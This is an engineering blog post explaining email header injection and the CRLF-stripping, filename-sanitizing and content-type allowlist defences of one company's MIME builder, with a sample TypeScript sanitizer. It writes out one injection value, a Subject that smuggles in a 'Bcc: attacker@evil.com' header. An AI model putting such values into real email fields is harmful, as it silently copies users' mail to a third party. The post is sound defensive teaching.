Engineering · March 10, 2026 · 6 min read

MIME injection and why email headers are dangerous

Header injection attacks are subtle and easy to miss. Here's how NexusSend's MIME builder defends against them.

Security Engineering

What is header injection

Email headers are newline-delimited. A Subject value of Hello\r\nBcc: attacker@evil.com would silently add a Bcc header to every email sent through a naive implementation. This is a header injection attack, and it's been exploited in production email systems for decades.

The attack surface is any user-controlled string that ends up in an email header: subject lines, reply-to addresses, custom headers, and attachment filenames.

CRLF sanitization

NexusSend's MIME builder strips all CR (\r) and LF (\n) characters from every header value before encoding. This is applied to subject, from, to, cc, bcc, reply-to, and any custom header field.

The sanitization happens at the MIME assembly layer, not at the input validation layer. This means even if a value passes Zod validation, it is still sanitized before it touches the wire. Defense in depth.

Attachment safety

Attachment filenames are sanitized by removing surrounding quotes and stripping control characters. Content-Type values are validated against an allowlist of safe MIME types — arbitrary content types are rejected before the MIME tree is assembled.

File size is validated client-side for UX and server-side for enforcement. Base64 encoding is validated for format correctness before the payload is passed to the Gmail API.
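A minimal header-sanitizing MIME builder that illustrates the three controls above (CRLF stripping at assembly time, filename sanitization, and a Content-Type allowlist). This is an added example, not NexusSend's code; the function names and the allowlist contents are assumptions.

```typescript
// Constructed allowlist of attachment content types (assumption, not NexusSend's list).
const ALLOWED_CONTENT_TYPES = new Set([
  "application/pdf",
  "image/png",
  "image/jpeg",
  "text/plain",
]);

// Strip CR and LF so a header value can never start a second header line.
function sanitizeHeaderValue(value: string): string {
  return value.replace(/[\r\n]/g, "");
}

// Remove surrounding quotes, then strip ASCII control characters (including DEL).
function sanitizeFilename(name: string): string {
  const unquoted = name.replace(/^"+|"+$/g, "");
  return unquoted.replace(/[\x00-\x1f\x7f]/g, "");
}

// Reject any Content-Type not on the allowlist before the MIME tree is built.
function assertAllowedContentType(contentType: string): string {
  const normalized = contentType.trim().toLowerCase();
  if (!ALLOWED_CONTENT_TYPES.has(normalized)) {
    throw new Error(`content type not allowed: ${contentType}`);
  }
  return normalized;
}

// Naive builder for comparison: it interpolates values unchanged.
function naiveBuildHeaders(fields: Record<string, string>): string {
  return Object.entries(fields).map(([n, v]) => `${n}: ${v}`).join("\r\n") + "\r\n";
}

// Hardened builder: sanitization happens here, regardless of upstream validation.
function buildHeaders(fields: Record<string, string>): string {
  const lines: string[] = [];
  for (const [name, value] of Object.entries(fields)) {
    lines.push(`${sanitizeHeaderValue(name)}: ${sanitizeHeaderValue(value)}`);
  }
  return lines.join("\r\n") + "\r\n";
}

// Count header lines in the assembled output; an injected Bcc would add one.
function headerLineCount(headers: string): number {
  return headers.split("\r\n").filter((line) => line.length > 0).length;
}
```

Comparing naiveBuildHeaders and buildHeaders on the Subject value from the first section shows the difference: the naive output gains a third header line, the sanitized output keeps two.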